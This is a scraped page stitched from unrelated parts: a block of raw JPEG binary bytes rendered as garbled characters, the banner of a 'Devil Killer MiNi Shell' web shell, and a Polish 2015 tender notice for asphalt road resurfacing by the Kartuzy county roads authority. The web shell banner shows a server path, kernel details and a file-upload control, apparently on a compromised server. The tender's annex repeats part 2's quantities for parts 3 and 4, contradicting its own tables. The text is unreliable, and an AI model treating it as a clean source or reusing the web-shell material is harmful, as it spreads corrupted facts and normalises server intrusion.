JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150520/119180-N-2015.html

<p class="kh_header"><b>Kartuzy: Wykonanie odnowy nawierzchni bitumicznych w roku 2015.</b><br>
<b>Numer ogłoszenia: 119180 - 2015; data zamieszczenia: 20.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Kartuzach , ul. Gdańska 26, 83-300 Kartuzy, woj. pomorskie, tel. 058 6810715, faks 058 6811522.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zdp.kartuzy.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie odnowy nawierzchni bitumicznych w roku 2015..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie odnowy nawierzchni bitumicznych w roku 2015. Przedmiot zamówienia został podzielony na 4 części. Zamawiający dopuszcza składanie ofert na całość zamówienia lub na poszczególne części.
Wykonanie robót obejmuje następujące zadania:
a) oznakowanie miejsca robót wg projektu oznakowania i organizacji robót, który należy przedłożyć do akceptacji tut. Zarządu Dróg,
b) przedmiar robót:

Część nr 1: ZAJEZIERZE
Lp	Wyszczególnienie elementów rozliczeniowych	Jedn.	Ilość jedn.
1	2	3	4
	NAWIERZCHNIA		
1	Frezowanie istniejącej nawierzchni bitumicznej na właczeniach	m2	30,0
2	Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	5262,0
3	Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	5262,0
4	Wyrównanie ręczne istniejącej nawierzchni betonem asfaltowym	t	80,0
5	Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 3 cm o uziarnieniu AC8	m2	5262,0
6	Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 4 cm o uziarnieniu AC8	m2	0,0
7	Uzupełnienie i profilowanie poboczy z frezów bitumicznych	m2	2000,0
8	Wykonanie wjazdów bitumicznych wraz z podbudową	m2	10,0

Część nr 2: KŁÓSÓWKO
Lp	Wyszczególnienie elementów rozliczeniowych	Jedn.	Ilość jedn.
1	2	3	4
	NAWIERZCHNIA		
1	Frezowanie istniejącej nawierzchni bitumicznej na właczeniach	m2	30,0
2	Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	3270,0
3	Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	3270,0
4	Wyrównanie ręczne istniejącej nawierzchni betonem asfaltowym	t	50,0
5	Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 3 cm o uziarnieniu AC8	m2	3270,0
6	Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 4 cm o uziarnieniu AC8	m2	0,0
7	Uzupełnienie i profilowanie poboczy z frezów bitumicznych	m2	1150,0
8	Wykonanie wjazdów bitumicznych wraz z podbudową	m2	60,0

Część nr 3: SULĘCZYNO - LIPUSZ
Lp	Wyszczególnienie elementów rozliczeniowych	Jedn.	Ilość jedn.
1	2	3	4
	NAWIERZCHNIA		
1	Frezowanie istniejącej nawierzchni bitumicznej na właczeniach	m2	24,0
2	Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	3444,0
3	Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	3444,0
4	Wyrównanie ręczne istniejącej nawierzchni betonem asfaltowym	t	90,0
5	Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 3 cm o uziarnieniu AC8	m2	3444,0
6	Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 4 cm o uziarnieniu AC8	m2	0,0
7	Uzupełnienie i profilowanie poboczy z frezów bitumicznych	m2	1600,0
Część nr 4: KAMELA
Lp	Wyszczególnienie elementów rozliczeniowych	Jedn.	Ilość jedn.
1	2	3	4
	NAWIERZCHNIA		
1	Frezowanie istniejącej nawierzchni bitumicznej na właczeniach	m2	24,0
2	Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	4643,0
3	Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	4643,0
4	Wyrównanie ręczne istniejącej nawierzchni betonem asfaltowym	t	80,0
5	Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 3 cm o uziarnieniu AC8	m2	4643,0
6	Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 4 cm o uziarnieniu AC8	m2	0,0
7	Uzupełnienie i profilowanie poboczy z frezów bitumicznych	m2	400,0
8	Wykonanie wjazdów bitumicznych wraz z podbudową	m2	60,0

c)	uporządkowanie terenu..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego na podstawie art. 67 ust.1 pkt 6 ustawy PZP w ilości do 50% przedmiotowego zamówienia w zakresie robót określonych w pkt. 3.2.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.20-6, 45.23.32.20-7, 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do zamówienia należy wnieść wadium przed upływem terminu składania ofert w kwocie 15500,00 zł (słownie: piętnaście tysięcy pięćset złotych 00/100) za całość zamówienia lub za poszczególne części w wysokości:
Część 1: 3500,00 zł (słownie: trzy tysiące pięćset złotych 00/100),
Część 2: 5000,00 zł (słownie: pięć tysięcy złotych 00/100),
Część 3: 4000,00 zł (słownie: cztery tysiące złotych 00/100)
Część 4: 3000 zł (słownie: trzy tysiące złotych 00/100). 
Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu - wpłacone przelewem na rachunek bankowy zamawiającego nr 59 1020 1866 0000 1102 0002 6989 z podaniem tytułu Wadium przetarg nieograniczony - Wykonanie odnowy nawierzchni bitumicznych w roku 2015 wraz ze wskazaniem części, której dotyczy.
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
Wadium należy wnieść przed upływem terminu składania ofert, lecz nie później niż do dnia 08.06.2015r. do godz. 1045.
Za datę wniesienia wadium uznaje się datę wpływu środków na rachunek Zamawiającego, a do oferty - wymóg porządkowy, należy załączyć opisaną zgodnie z pkt 4 kserokopię przelewu potwierdzoną za zgodność z oryginałem. Zamawiający zastrzega sobie prawo sprawdzenia czasu wpływu wadium na swoje konto. 

W przypadku wnoszenia wadium w pozostałych formach, dokument wadium należy złożyć w osobnej opisanej kopercie (kopertę wadium spiąć z kopertą oferta), natomiast potwierdzoną za zgodność z oryginałem kserokopię, dołączyć do oferty. 
Wadium składane w formie innej niż pieniężnej musi mieć datę początkową ważności równą, co najmniej terminowi składania ofert, a datę końcową ważności upływającą najwcześniej w ostatnim dniu związania ofertą. W razie zawieszenia postępowania lub przedłużenia terminu składania ofert, końcowy termin ważności wadium wniesionym w formie niepieniężnej albo zostanie przedłużony przez Wykonawcę albo wniesie on nowe wadium na przedłużony okres.
Zamawiający zastrzega, że w razie składania gwarancji lub poręczeń jako wadium przetargowego, w treści tych gwarancji i poręczeń nie mogą być żadne postanowienia ograniczające prawo Zamawiającego do ich realizacji. 
Wykonawcy, którzy nie wniosą wadium do upływu terminu składania ofert zostaną wykluczeni z postępowania o udzielenie zamówienia, zgodnie z art. 24 ust. 2 pkt 2 ustawy Pzp.
Zamawiający zwraca wadium w przypadkach oraz na zasadach określonych w art. 46 ust. 1-4 ustawy Pzp.
Zamawiający zatrzymuje wadium w przypadku wystąpienia okoliczności wskazanych w art. 46 ust. 4a i 5 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa warunku w tym zakresie - oświadczenie stanowiące:
załącznik nr 3a jako dokument potwierdzający spełnienie warunku w postępowaniu na podstawie art. 22 ust. 1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa warunku w tym zakresie - oświadczenie stanowiące:
załącznik nr 3a jako dokument potwierdzający spełnienie warunku w postępowaniu na podstawie art. 22 ust. 1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa warunku w tym zakresie - oświadczenie stanowiące:
załącznik nr 3a jako dokument potwierdzający spełnienie warunku w postępowaniu na podstawie art. 22 ust. 1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa warunku w tym zakresie - oświadczenie stanowiące:
załącznik nr 3a jako dokument potwierdzający spełnienie warunku w postępowaniu na podstawie art. 22 ust. 1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa warunku w tym zakresie - oświadczenie stanowiące:
załącznik nr 3a jako dokument potwierdzający spełnienie warunku w postępowaniu na podstawie art. 22 ust. 1 ustawy pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dowód wniesienia wadium, oferta, kosztorys ofertowy, oświadczenie o podwykonawcach, Upoważnienie do podpisania oferty (pełnomocnictwo) powinno być dołączone do oferty, o ile nie wynika ono z dokumentów dołączonych do oferty. Upoważnienie to powinno być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza.
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, wymienionych w pkt 6.3, zastępuje się  je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone  przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania  osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - gwarancja - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartych w umowie, przez sporządzenie aneksu w zakresie:

a) 	terminu realizacji umowy:
-	opóźnienia w przekazaniu placu budowy z winy Zamawiającego;
-	wady i braki w dokumentacji projektowej lub innych dokumentów budowy,
-	wyjątkowo niesprzyjające warunki atmosferyczne uniemożliwiające prowadzenie robót;
-	wykopaliska lub inne przeszkody uniemożliwiające prowadzenie robót;
-	zmiany dokumentacji projektowej;
b)	W zakresie zmiany wynagrodzenia:
-	wykonanie robót zamiennych lub dodatkowych, niezbędnych do wykonania przedmiotu umowy;
-	ustawowe zmiany wysokości podatku VAT (zmiana wynagrodzenia brutto);
-	wysokości wynagrodzenia Wykonawcy (zostanie ustalone na podstawie cen ujętych w poszczególnych pozycjach kosztorysu oraz ilości rzeczywiście wykonanych i odebranych robót ustalonych na podstawie obmiaru.)
c)	W zakresie innych zmian:
-	zmiany umowy polegające na zmianie jakości lub innych parametrów charakterystycznych dla danego dla danego elementu robót lub zmiana technologii,
-	zmiany w zakresie kolejności i terminów wykonywania robót budowlanych wskazanych w harmonogramie;
-	zmiana w przypadku aktualizacji rozwiązań z uwagi na postęp techniczny lub zmiany obowiązujących przepisów prawa;
-	zmiana zakresu robót powierzonych podwykonawcom.
Warunkiem wprowadzania zmian są zapisy umowy tj. rozliczenie zgodne z zakresem wykonanych robót, sporządzenie i podpisanie aneksu przez strony umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zdp.kartuzy.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Kartuzyach, ul. Gdańska 26, 83-300 Kartuzy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2015 godzina 10:45, miejsce: Zarząd Dróg Powiatowych w Kartuzyach, ul. Gdańska 26, 83-300 Kartuzy, pok. nr 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie odnowy nawierzchni bitumicznych w roku 2015 część 1 Zajezierze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) oznakowanie miejsca robót wg projektu oznakowania i organizacji robót, który należy przedłożyć do akceptacji tut. Zarządu Dróg,
b) Frezowanie istniejącej nawierzchni bitumicznej na właczeniach	m2	30,0
Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	5262,0
Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	5262,0
Wyrównanie ręczne istnejącej nawierzchni betonem asfaltowym 	t	80,0
Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 3 cm o uziarnieniu AC8	m2	5262,0
Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 4 cm o uziarnieniu AC8	m2	0,0
Uzupełnienie i profilowanie poboczy z frezow bitumicznych	m2	2000,0
Wykonanie wjazdów bitumicznych wraz z podbudową	m2	10,0
c) uporządkowanie terenu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.20-6, 45.23.32.20-7, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie odnowy nawierzchni bitumicznych w roku 2015 część 2: Kłosówko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) oznakowanie miejsca robót wg projektu oznakowania i organizacji robót, który należy przedłożyć do akceptacji tut. Zarządu Dróg,
b) Frezowanie istniejącej nawierzchni bitumicznej na właczeniach	m2	30,0
Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	3270,0
Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	3270,0
Wyrównanie ręczne istnejącej nawierzchni betonem asfaltowym 	t	50,0
Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 3 cm o uziarnieniu AC8	m2	3270,0
Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 4 cm o uziarnieniu AC8	m2	0,0
Uzupełnienie i profilowanie poboczy z frezow bitumicznych	m2	1150,0
Wykonanie wjazdów bitumicznych wraz z podbudową	m2	60,0
c) Uporządkowanie terenu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.20-6, 45.23.32.20-7, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie odnowy nawierzchni bitumicznych w roku 2015 część nr 3: Sulęczyno - Lipusz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) oznakowanie miejsca robót wg projektu oznakowania i organizacji robót, który należy przedłożyć do akceptacji tut. Zarządu Dróg,
b) Frezowanie istniejącej nawierzchni bitumicznej na właczeniach	m2	30,0
Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	3270,0
Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	3270,0
Wyrównanie ręczne istnejącej nawierzchni betonem asfaltowym 	t	50,0
Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 3 cm o uziarnieniu AC8	m2	3270,0
Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 4 cm o uziarnieniu AC8	m2	0,0
Uzupełnienie i profilowanie poboczy z frezow bitumicznych	m2	1150,0
c) Uporządkowanie terenu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.20-6, 45.23.32.20-7, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wykonanie odnowy nawierzchni bitumicznych w roku 2015 część nr 4: Kamela.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) oznakowanie miejsca robót wg projektu oznakowania i organizacji robót, który należy przedłożyć do akceptacji tut. Zarządu Dróg,
b) Frezowanie istniejącej nawierzchni bitumicznej na właczeniach	m2	30,0
Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	3270,0
Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	3270,0
Wyrównanie ręczne istnejącej nawierzchni betonem asfaltowym 	t	50,0
Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 3 cm o uziarnieniu AC8	m2	3270,0
Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 4 cm o uziarnieniu AC8	m2	0,0
Uzupełnienie i profilowanie poboczy z frezow bitumicznych	m2	1150,0
Wykonanie wjazdów bitumicznych wraz z podbudową	m2	60,0
c) Uporządkowanie terenu.</p></li>
